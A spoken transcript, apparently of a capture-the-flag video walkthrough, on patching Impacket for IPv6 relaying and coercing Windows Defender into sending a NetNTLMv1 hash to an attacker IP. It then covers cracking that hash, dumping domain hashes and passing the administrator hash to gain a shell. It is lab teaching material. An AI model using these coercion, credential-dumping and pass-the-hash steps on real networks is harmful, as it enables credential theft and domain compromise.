IP, and it's like lowercase. If we just set this, it's going to listen on all interfaces. And then c.set IPv6 to be true. Now we can pretty much start this. So server is equal to RPC relay server C. I typer that, relay server C, and then s.run. Okay, so that's good. Now, the last thing we want to do is start a virtual environment so we can install this Impacket and just have everything good. So I'm going to do python-m VM, and that creates this directory, virtual env, where we can install all the libraries. So I'm going to do source VM bin activate, and then we can do pip install -r requirements.txt. So this will install everything we need for Impacket to run. I'm not sure if there's anything I don't have already on my host that wouldn't be in this, but yeah. So successfully installed. So let's run Python 3, what do we call it, RPC test.py. No directory Impacket dot. Did I even type that? vrpc test. So I typoed. Where is this? I probably typed this in somewhere else. grep.ri. Yeah. Typoed in this file. There we go. Run this. SMB to support. I probably have the casing wrong on this. So let's see. It's probably lowercase s, lowercase mb, I mean. Oh, it's set SMB to support. That's what it is. Permission denied, because we have to listen on that socket. There we go. We set up the RPC server. So I'm going to switch over to this pane. And let's do Python 3 RPC. We have to go cd Impacket source VM bin activate. I'm just doing it on this pane so we can see things better. RPC. So now when we connect to this, we get an error message. So now we have to start debugging. So I'm going to grab this, and then we'll edit this file. And what line was that on? Let's see, this line is 60, right here. This is the error we're looking at. So let's go to line 60 and see what this is. So we're looking at this setup block right here, and the error said client address doesn't exist. If we look elsewhere in the code, like this, I believe, initialization function, we have a client underscore address. And in this log message, we have a self.client underscore address. I'm guessing that's what we need. So I'm going to replace this with self.client underscore address. And we will continue on. So let's run this. And now we got a different error. No bool replace. And this one is, let's see, in line 61 in this. So let's go here, 61. And it's saying no bool replace right here. So I'm going to do import pdb and then pdb.set underscore trace. Save this. And I want to look at what get target is. So I'm going to grep-r. I'm going to do def get target to see what file this is in, so we can see a little bit about it. It's probably going to be this NTLM relay thing, not netview. So let's grab this, get target, and let's see. Should have another way to list failed attempt with user, identity. So I'm not sure what this code is doing, but we may want to try changing get target to be none. We don't know what get target is, but we have identity is equal to none right there. So let's go and run the code again. We have the breakpoint in. So if we go back to, what was it, line 50-ish? We have the breakpoint here. So we should be good. Just going to less this and get target. Just want to copy this command. Run it again. We should go into PDB, and I didn't have to copy it because it shows what the next line will be, but we can look at this, and we have Boolean object has no attribute replace. So what is this self server config random targets? If we look at this, it is set to false. So what would happen if we just instead called get target with none? And we get something parsed. We have scheme, SMB, net location, deadbeef. This looks like to be the server address, because my IPv6 address, I think, ends in like 1001. We do IP ADDR. My IP ends in, 1001 for IPv6. So this is the server's IP. So let's set get target to none and see what happens. Type reset because my terminal got kind of janky. So let's go back here. Let's see, where is this? We can delete that breakpoint, and we want to set this to none. Okay. We go back, run it, and see what happens. We still get error messages, and this one is in line 63 of this. None type has no attribute scheme. So let's look at this file. VI on this, 63, and we don't have a self.target scheme. So what I'm going to do is we'll just remove a lot of this and just leave a received connection from. And we'll say self.client_address 0. Then we delete this line. We probably need from %s, was it like that? That looks better. Run the code yet again. And we have an error somewhere in negotiate NTLM session. So let's, again, we'll go here, BI, what line is it, 174? Let's see. This one, I don't know exactly where this error is coming from. Try compute the challenge. See if we go back to do NTLM negotiate. I'm guessing we do something in this function to get there. Let's see. Okay, yeah. I was looking down here. We want to look at this. So a NIT connection has no attribute. So 197. Let's see. Self.client. Let's just try moving this line up. Because we have self.client being defined here, and this is doing self.client initiate connection. And we're saying self.client creates this SMB client from this server config. So let's run this, start, and we still get an error message. This is going to be in a different spot though. None type, no attribute host name. So line 31 of init. And let's set a breakpoint here. So it doesn't know what target.hostname is right here. That was what that error was. So if we do target.hostname, let's step. So let's see. Target. I don't know why I can't see what that variable is. Okay. Am I where I think I am? Okay, I'm still in init. And we have target. And we look at hostname. It is dead. So what's happening here is something hilarious because this library, I guess, doesn't expect IPv6. And IPv4, you do an IP address : the port number. So they created the function hostname to say, okay, let's just split the net location upon a colon, and the hostname is going to be the very first one. And I guess there's probably a target port, target dot. Yeah, the port is everything else. So, yeah. So they said, okay, everything before the first colon is going to be the host name. Everything after is going to be the port. And this is wrong in IPv6. IPv6, a correct socket is typed like you put the IP address within brackets and then colon the port. But it's not doing that. So we have to fix that. Let's go here. It was right here. So what I'm going to do is we'll say IP is equal to, what is it? Target.netLocation. And we're going to replace, so .replace :445 with nothing. So we're just saying strip out the port, and that'll be the IP address. So target host can now be IP, and then target.port. When we tried using target.port there, it errored because it thought port was like beef : a bunch of things, and that's not valid. So let's just get rid of that and say self.targetPort is equal to, we'll try target port and see what happens there. And then self.target, I don't know what's different between target and target host. I wonder if we can just leave that there. Let's set a breakpoint again. Import PDB, pdb.set trace. Run this again. First we have to start a server. This may have to time out. There we go. So IP. If we do IP, it's dead beef, whatever. That looks good. Let's step in, target port, 445. Looks good. Target. Target is this whole thing. Extend security, none, session data. If we continue, we get the hash. Success. We screwed up some things though. Let's see, message. So log error. Where did log error fail? Not all arguments converted during string formatting. What if I just try printing instead of doing a log message? Let's see, this is an RPC relay server. 189. Let's just print. Sometimes when doing logging, if you give it weird things, it behaves oddly. And this behaved oddly. Oh wait, we have this debug. Let's get rid of that debug. So that was in init, PDB. We can delete that. So we're getting the hash. There's still an error message. Something doesn't have net location. I wonder if this is the target. If I edit this, I'm going here. I wonder if target, if we just give it IP, if that's fine. But right now, we don't have to fix it because even though it errored, it continued and eventually gave us this hash. And we can see the hash version's NTLM. But this is what we want. The hash string. If we copy this, go back to our Obsidian notes, go to NT hash, this 95 AC, it is the same. So remember, this is what we did a long time ago in the video with the Defender hash. When we use Defender to grab that. So let's see. I think I fixed that. Let's run this again. Do we get any error messages? We do. No attribute net location. So let's see. If 445 in target.netLocation, else IP is equal to target.netLocation. So what I think this error message is saying is this IP, it tried to replace net location and it didn't exist maybe. So I'm checking if 445 is in it to begin with. None type, okay. We're screwing something up. I don't know exactly what. It doesn't matter because the program still works. Try. This is the lazy way, accept, pass. Local IP. Let's see. Accept p is equal to target.netLocation. Is that going to work? Yeah, I'm not exactly sure why it's erroring. But it doesn't really matter because we do get our hash string. So now I guess the final part of this video is going into my email to show you the Crack.SH service did respond. So let's do that. And here we are at my email. I did pause the video after I did the Defender stuff because I just had things to do. So 13 hours ago, we can see it was submitted. And then also 13 hours ago, you can see it took it 30 seconds to crack that NetNTLMv1 hash. And it got the key, which is this. And this key is actually the NTLM hash of the account. So if we now do, let's say, SecretsDump.py, and say dash hashes, I think, paste, and then APT $101010, or let's see, the username is going to be APT, and then the host is going to be APT. I wonder if we do @ There we go. And it is going to log in successfully, and we do the DC sync. So we have Henry.Vinson's, but we also have administrator, and we can try administrator, and now we can use this one to psexec. So psexec.py hashes, and then cmd, or administrator at apt cmd. Let's see. Did not work because I typoed administrator. There we go. And it's uploading the file. Come on. I wonder if Defender's catching this. It shouldn't. There we go. Now it's starting service. It's taking its sweet time. I guess the longest running psexec is a watched one. We could probably use SMB client or something to grab this. And there is one last piece of this video I wanted to get into, and that was the CrackMapExec does support IPv6 if you do a later version. Why don't you start the service? Let's just restart this. Is it going to go quick if I restart? Requesting shares, uploading, starting service. Come on. We may want to do wmiexec. Going to copy this. We can try wmi. We'll paste this. wmiexec.py. Let's see if this works. Part of me is wondering if it just doesn't like IPv6. Let's see. Exit out of this. I think WinRM, does this support hashes? Let's see. Password hash. Yeah, it does. I'm going to do -H, paste this hash. We'll try administrator. invalid hash format. There you go. Wait, what? C37 and it ends in, oh, I just grabbed up to there. We want this. Okay, hash, paste, connect, there we go. We're administrator. And if we go into desktop, we can get root.txt. So that'll pretty much be the video. We're gonna go and clean up notes. We got a lot of like crap to do because we didn't do a great job with that Impacket stuff. So let's see, accounts. We may want to say when administrator paste this, and the note will be SecretsDump with APT. There we go. So enumeration tools. This is the last thing we took notes on. So we should probably escape all these slashes. And we're going to have to, we're not going to modify like everything we did in Impacket. We should, but I mean, I wasn't taking good notes as we went, so I won't do that. You can probably go to like OXDF's write-up. We worked on it together, so ours are going to be not exactly, but pretty much the same. So after enumeration tools, we did NetNTLM or NetNTLMv1, Defender. So we have to explain how we got this NT hash. Whoops, there we go. So Defender, I wonder if we still have it here. Was it MP scan? We don't. So Defender, when running MP scan, Defender uses the system user. In this case, it's APT. Because it's kind of like a setuid binary in Linux, that MP scan, whenever you run it, it communicates to a service over a named pipe, and that service initiates the scan. So that service is running a system, and it's APT. And say this is patched on latest Windows. Well, that part's not patched. APT, if scanning a UNC path, we can force system to authenticate to us, which is patched on latest Windows. And this is just something I know. You would research that like Defender thing or try it on an environment to see if it works and come to the conclusion Microsoft did patch that. And that is a relatively recent patch because this machine came out like within the last 4 months. So if scanning UNC path is patched on the latest Windows due to the LM compatibility level being 2, NetNTLMv1 can be used, which allows cracking the hash. And for the notes, I guess we can run this again. Let's exit this and go into Henry.Vinson. And let's exit that. We want to remove the Impacket thing. So remove user share Impacket, not Impacket, responder.db. We have to sudo remove that. There we go. So we can say responder-i ton0 --lm sudo. There we go. And this one we do MP scan. So this was in CD program files. What? cd \program files. And this is just shorthand way to write program files. If you do squiggly 2, it would do program files x86. We're in Windows Defender. There's MP scan in here. Let's see. MP scan. Is there a bin? Let's see. Let's just look for dir, or not dir, exe, and shoot. Dir select string exe. Oh, shoot. I just did a strings against the dir command. I was hoping to like pipe it and then just look for exes. Oh, npcmd run. This is what it is. So we can do npcmd run -scan type 3 -file 10.10.14.3 / t/ let's just say, oh god, 10.10.14.3 / please subscribe / file. I'm going to copy this because I want to paste it in a window here so it's clean for the screenshot. Let's see. npcmd run.exe. What if I do /? There we go. And that should be good. So we can take a screenshot. There we go. Copy, and then grab that. Actually, yeah, that's fine. Paste the screenshot. So now our defender has a pretty screenshot. And then we can say 40. This will be RoguePotato. And what we can do is put this as a second, and this will be RoguePotato, and create a new note. This is kind of why we do the numbers. We'll call this 33, go halfway between, getting APT hash. And then we just put that into this folder. So when we combine all these files, we just inserted this before NTLM and before Defender and RoguePotato. And we can say getting APT hash. The LmCompatibilityLevel allows NetNTLMv1. There's at least 2 ways to force the system to make a connection where the attacker could steal this hash. There we go. There was a typo I made in allows. There we go. So now if you combine this, you'd have this being the parent and then going into subtopics. So RoguePotato, I'm just going to do a high level of steps. Modify RoguePotato to allow IPv6. Modify Impacket to allow RPC servers and dump hashes. So that would pretty much be what I do here. And I'd probably review this note and just be furious. But at this point, I'd probably just like tar this up. So tar cjvf Impacket 921, and I'd call this Impacket-rogue NTLMv1 steal. And then put this folder somewhere on a repo I have so I can always have this. So yeah, that'll be the video. Hope you guys enjoyed it. Take care, and I will see you all next week.